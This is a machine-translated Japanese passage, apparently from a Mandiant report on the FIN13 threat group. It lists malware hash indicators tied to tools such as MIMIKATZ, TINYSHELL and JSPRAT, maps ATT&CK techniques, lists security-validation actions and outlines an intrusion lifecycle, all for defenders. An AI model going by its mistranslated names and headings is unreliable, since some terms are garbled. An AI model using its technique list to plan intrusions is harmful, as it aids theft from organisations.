d961148e97857562b9cf06a0e2d154352338d60d375f9b48f61e9f26480e443b

ホットレーン

b451fe96ab76cf676cf22a258fdb38ce

8c8ad56ec08a4b23e0593c3d578fd7e23dc45211

4b1b1fd688a5bf4e27a4e62a56b67e1c45536603c8ecdefe88a3b0ff37cec798

ホットレーン

94642e317bdbcc5d216aa730ae851a05

adca9b2d2e9e1c2cfbeb2f730894bf5ba54acad8

906b0e99850448a45ab3de4115954d5ff02b6edd4c2b0f5d59f40045f668246c

JSPRAT

ab2dbe55a54368e0ba4c9a4abe71b47b

7439a49cd10616a7c9d649120dfba7eca7f224b8

c7740484dba2eaac5f3455596df3b8f9c127a9d6f50268bc3375afbff3c6020e

JSPRAT

a4cff691eda32dc11a621d9731fcea73

75b58a5fef77886d697041cfab5c3d6beda21661

efce809b03fe30765837e99bdfa6766d4506f9ba8351ec611979ce16f841e1ac

JSPRAT

8a8597d1bfa42229224c46e38ebed07b

5fc73458f617a7fb12d3c769ea07f5ec61e12153

ba5f9281ac9a9bc7c4684dd96603e033f133c26482734b27be4b6f4b5f74f5ad

JSPRAT

34a8ac7dfc5ce7b4a1992abdb5e0fa15

12f6c27f400e85fb8f075ff7b17f475a383b4499

db3bda73338c164d523c0ab27e774f81921d5ab6518ef667fffd10edf169bfbd

ラッチキー

0b26021f37f01f00cc6cf880bd3d7f68

4ab56883ddcb3d3e9af22aa73898d5ca7d2250a6

b23621caf5323e2207d8fbf5bee0a9bd9ce110af64b8f5579a80f2767564f917

メールスロット

5fe987a61b88e34102002a1f13cfee3d

28333822aab1eeebfb299c845b32a2fa17e7747d

5e59b103bccf5cad21dde116c71e4261f26c2f02ed1af35c0a17218b4423a638

ミミカッツ

d7af79c4533e3050c47044e41c90e829

463a36c5fb8c8dffc659f9d1eb4509d8f62816e7

c1fb986e7f6fde354382d7b46460fb9af799a0abbac4c179ca9b3f56aadc7f98

ナイトジャー

b130215dd140fa47d06f6e1d5ad8e941

28427a2778731b3b247edf6a576b8149e9784d28

fa6f93ef0bb35a9dad1a5e60105c7110da3a2f8bd37a4ae3bff7f1a1c61b2720

ナイトジャー

86327a5429ca8c58685a310b98d1be95

e92c1a2f03f5895889313c8e8f4fea1aa6f24652

5ece301c0e0295b511f4def643bf6c01129803bac52b032bb19d1e91c679cacb

舷窓

f4b56e8b6c0710f1e8a18dc4f11a4edc

2e309fa21194a069feb02ff0cd9cafe06d84f94d

84ac021af9675763af11c955f294db98aeeb08afeacd17e71fb33d8d185feed5

舷窓

33c22962e43cef8627cbc63535f33fce

72906cec6bc424f8a9db5ca28ece2d2d2200dba2

61257b4ef15e20aa9407592e25a513ffde7aba2f323c2a47afbc3e588fc5fcaf

PROCDUMP

42539491f0e4fe145b9ed7d002bcb9ae

ddebbf15665986402e662947c071979329dd1a71

2f1520301536958bcf5c65516ca85a343133b443db9835a58049cd1694460424

PROCDUMP

a92669ec8852230a10256ac23bbf4489

4bed038c66e7fdbbfb0365669923a73fbc9bb8f4

16f413862efda3aba631d8a7ae2bfff6d84acd9f454a7adaa518c7a8a6f375a5

6パック

863ead7a592b47d7547ab7931c935633

f7cc106b208a9c3e4d630627954489dd2b0d5bda

a3676562571f48c269027a069ecb08ee08973b7017f4965fa36a8fa34a18134e

振り落とす

9e0563caa00582c3aa4bf6c41d9f9c46

4716aeb3076a6b0fd00ec9f5144747270407dcc1

4029788b2cb65282f4264283a359710988380bce22ed67788c8d978b28e0aea9

スウェアジャー

f50efee758de4aa18f0ce9459d5722f4

13dfe71b95d3932ca4e39b84e6ded5086abe2b60

1e675e32ebb61b6259b0df978e3ffa02695ef120f8a2a5639f2ae18e14fd1a4d

スウェアジャー

9340e6fc1d6d6b0379ab1583ccc2a0b1

b0caaf26e52168cb839f12ba499ff1602ce8191b

0463fa109106363b4c87c8909bfcc4bf3ce238566173359108b0a5ae5d749be2

スウェアジャー

6488086b07a36a2842df5b5451b3640b

dda98668eda22cf20897960fc8ffc964ae415582

2f23224937ac723f58e4036eaf1ee766b95ebcbe5b6a27633b5c0efcd314ce36

スウェアジャー

2e9ae2864d368ed1e6747ba28440ba5c

8bfd968026b4268ba7d205871e329717aec2def8

e76e0a692be03fdc5b12483b7e1bd6abd46ad88167cd6b6a88f6185ed58c8841

タイニーシェル

428b47caf74ce986bc3688262355d5b7

dadb1cc49fa8fa577bb6d09e15639ab54dd46c18

0dd4d924c9069992dd7b3e007c0f3ca149b7fb1ce0dfb74b37c7efc6e1aebb46

WMIEXEC

dc78c63a267ef5f894e99aa1e6bfe888

75c728ec83c65348e51ef1e63915a2415886bc9f

0e141b51aa20f518a79185f835491eba65998301eff03133a2969510798bc674

MITRE ATT&CK の技術

ATT&CK タクティカル カテゴリー

テクニック

Desarrollo de recursos:

インフラストラクチャの取得(T1583)

開発能力(T1587)

能力を獲得する (T1588)

ステージ機能(T1608)

アクセソイニシャル:

公開アプリケーションの悪用 (T1190)

排出:

Windows 管理インストルメンテーション(T1047)

スケジュールされたタスク/ジョブ(T1053)

コマンドおよびスクリプト インタープリター(T1059)

プロセス間通信(T1559)

システム サービス(T1569)

永続性:

スケジュールされたタスク/ジョブ(T1053)

アカウントの作成(T1136)

サーバー ソフトウェア コンポーネント(T1505)

システム プロセスの作成または変更(T1543)

イベント トリガーによる実行(T1546)

ブートまたはログオンの自動開始の実行(T1547)

特権のエスカレーション:

スケジュールされたタスク/ジョブ(T1053)

プロセス インジェクション(T1055)

アクセス トークンの操作(T1134)

ブートまたはログオンの自動開始の実行(T1547)

防御的回避:

難読化されたファイルまたは情報(T1027)

プロセス インジェクション(T1055)

ホストでのインジケータの削除(T1070)

レジストリの変更 (T1112)

アクセス トークンの操作(T1134)

ファイルまたは情報の難読化解除/デコード(T1140)

仮想化/サンドボックスの回避(T1497)

代替認証素材を使用する(T1550)

信頼コントロールを覆す (T1553)

防御力の低下 (T1562)

アーティファクトを非表示 (T1564)

ハイジャック実行フロー(T1574)

資格情報にアクセスします。

OS 資格情報のダンプ(T1003)

ネットワーク盗聴(T1040)

セキュリティで保護されていない資格情報(T1552)

発見:

システム サービス ディスカバリ(T1007)

レジストリのクエリ(T1012)

システム ネットワーク構成の検出(T1016)

リモート システム ディスカバリ(T1018)

システム所有者/ユーザーの検出(T1033)

ネットワーク盗聴(T1040)

ネットワーク サービス スキャン(T1046)

システム ネットワーク接続の検出(T1049)

プロセス ディスカバリ(T1057)

アクセス許可グループの検出(T1069)

システム情報検出(T1082)

ファイルとディレクトリの検出(T1083)

アカウントの検出(T1087)

ネットワーク共有の検出(T1135)

仮想化/サンドボックスの回避(T1497)

ソフトウェア検出(T1518)

横方向の動き:

リモート サービス(T1021)

代替認証素材を使用する(T1550)

コレクション:

ネットワーク共有ドライブからのデータ(T1039)

ステージングされたデータ(T1074)

情報リポジトリからのデータ(T1213)

収集データのアーカイブ(T1560)

コマンド y コントロール:

プロキシ(T1090)

アプリケーション層プロトコル(T1071)

非アプリケーション層プロトコル(T1095)

Ingress ツール転送(T1105)

データ エンコーディング(T1132)

プロトコル トンネリング(T1572)

暗号化されたチャネル(T1573)

流出:

Web サービスを介した流出 (T1567)

影響:

サービス停止(T1489)

システムのシャットダウン/再起動(T1529)

Mandiant のセキュリティ検証アクション

組織は、Mandiant Security Validationを使用して次のことを行うことで、セキュリティ コントロールを検証できます。

ぶどうの木

名前

A102-144

コマンドアンドコントロール – FIN13、DRAWSTRING、C2通信

A104-905

ホスト CLI – FIN13、DRAWSTRING、スキャンから除外

A104-906

ホスト CLI – FIN13、DRAWSTRING、netsh を使用して通信を許可する

A104-907

ホスト CLI – FIN13、レジストリ キーを使用した永続性

A104-908

ホスト CLI – FIN13、スケジュール タスクを使用した持続性

A102-119

悪意のあるファイル転送 – FIN13、CLOSEWATCH、ダウンロード、亜種 #1

A102-120

悪意のあるファイル転送 – FIN13、DRAWSTRING、ダウンロード、亜種 #1

A102-121

悪意のあるファイル転送 – FIN13、DRAWSTRING、ダウンロード、亜種 #2

A102-122

悪意のあるファイル転送 – FIN13、GOBOT2、ダウンロード

A102-123

悪意のあるファイル転送 – FIN13、JSPRAT、ダウンロード、亜種 #1

A102-124

悪意のあるファイル転送 – FIN13、JSPRAT、ダウンロード、亜種 #2

A102-125

悪意のあるファイル転送 – FIN13、JSPRAT、ダウンロード、亜種 #3

A102-126

悪意のあるファイル転送 – FIN13、JSPRAT、ダウンロード、亜種 #4

A102-127

悪意のあるファイル転送 – FIN13、LATCHKEY、ダウンロード

A102-128

悪意のあるファイル転送 – FIN13、MAILSLOT、ダウンロード

A102-129

悪意のあるファイル転送 – FIN13、MIMIKATZ、ダウンロード

A102-130

悪意のあるファイル転送 – FIN13、NIGHTJAR、ダウンロード、亜種 #1

A102-131

悪意のあるファイル転送 – FIN13、NIGHTJAR、ダウンロード、亜種 #2

A102-132

悪意のあるファイル転送 – FIN13、PORTHOLE、ダウンロード、亜種 #1

A102-133

悪意のあるファイル転送 – FIN13、PORTHOLE、ダウンロード、亜種 #2

A102-134

悪意のあるファイル転送 – FIN13、SIXPACK、ダウンロード

A102-135

悪意のあるファイル転送 – FIN13、SPINOFF、ダウンロード

A102-136

悪意のあるファイル転送 – FIN13、SWEARJAR、ダウンロード、亜種 #1

A102-137

悪意のあるファイル転送 – FIN13、SWEARJAR、ダウンロード、亜種 #2

A102-138

悪意のあるファイル転送 – FIN13、SWEARJAR、ダウンロード、亜種 #3

A102-139

悪意のあるファイル転送 – FIN13、SWEARJAR、ダウンロード、亜種 #4

A102-140

悪意のあるファイル転送 – FIN13、TINYSHELL、ダウンロード

A102-141

悪意のあるファイル転送 – FIN13、WMIEXEC、ダウンロード

A102-142

悪意のあるファイル転送 – HOTLANE (UPX unpacked)、ダウンロード

A102-143

悪意のあるファイル転送 – HOTLANE、ダウンロード、UPX パック

A104-909

保護された劇場 – FIN13、GOBOT2、処刑

ありがとう

このブログは、Mandiant Consulting のインシデント対応チーム、マネージド ディフェンス アナリスト、FLARE の優れたリバース エンジニアリング研究者、検出ウィザードの Evan Reese、専門知識を持つ Jeremy Kennelly、Mandiant の脅威インテリジェンス コレクション チーム、そして Mandiant の縁の下の力持ちの皆様の並々ならぬ努力なしでは実現できなかったでしょう。ギアにグリースを塗って回転させ続けるエンジニア。

付録 A: 直接攻撃のライフサイクル

fin13 付録 A

初期偵察:攻撃者は標的のシステムと従業員を調査し、侵入の方法論を説明します。攻撃者は、環境へのリモート アクセスを提供するインフラストラクチャを検索したり、従業員を調査してソーシャル エンジニアリング攻撃を行ったりすることができます。

初期侵害:攻撃者は、1 つ以上のシステムで悪意のあるコードの実行に成功します。これは通常、ソーシャル エンジニアリング攻撃またはインターネットに接続されたシステムの脆弱性の悪用の結果として発生します。

プレゼンスの確立:最初の侵害の直後に、攻撃者は新たに侵害されたシステムを引き続き制御します。攻撃者は通常、永続的なバックドアをインストールするか、侵害されたシステムに追加のユーティリティをダウンロードすることによって、存在を確立します。

権限昇格:攻撃者は、環境内のシステムやデータへのアクセスを増やします。攻撃者は、多くの場合、資格情報を取得したり、キーストロークを記録したり、認証システムを破壊したりして、権限を昇格させます。

内部偵察:攻撃者は組織の環境をスキャンして、インフラストラクチャ、関心のある情報のストレージ、重要な個人の役割と責任をよりよく理解します。

横方向の移動:攻撃者は、「特権のエスカレーション」フェーズで取得したアカウントを使用して、侵害された環境内の別のシステムに横方向に移動します。一般的なラテラル ムーブメント手法には、ネットワーク ファイル共有へのアクセス、リモート コマンドの実行、またはリモート デスクトップ サービス (RDS) やセキュア シェル (SSH) などのリモート ログイン プロトコルを介したシステムへのアクセスが含まれます。

存在を維持する:攻撃者は、バックドアの複数のバリアントをインストールするか、企業の仮想プライベート ネットワーク (VPN) などのリモート アクセス サービスにアクセスすることにより、環境への継続的なアクセスを確保します。

ミッションの完了:攻撃者は、知的財産、財務データ、合併や買収に関する情報、または個人を特定できる情報 (PII) の盗難など、侵入の目的を達成します。また、ミッションの目的がシステムやサービスの停止、または環境内のデータの破壊である場合もあります。

参考: https ://www.mandiant.com/node/4706

Comments

タイトルとURLをコピーしました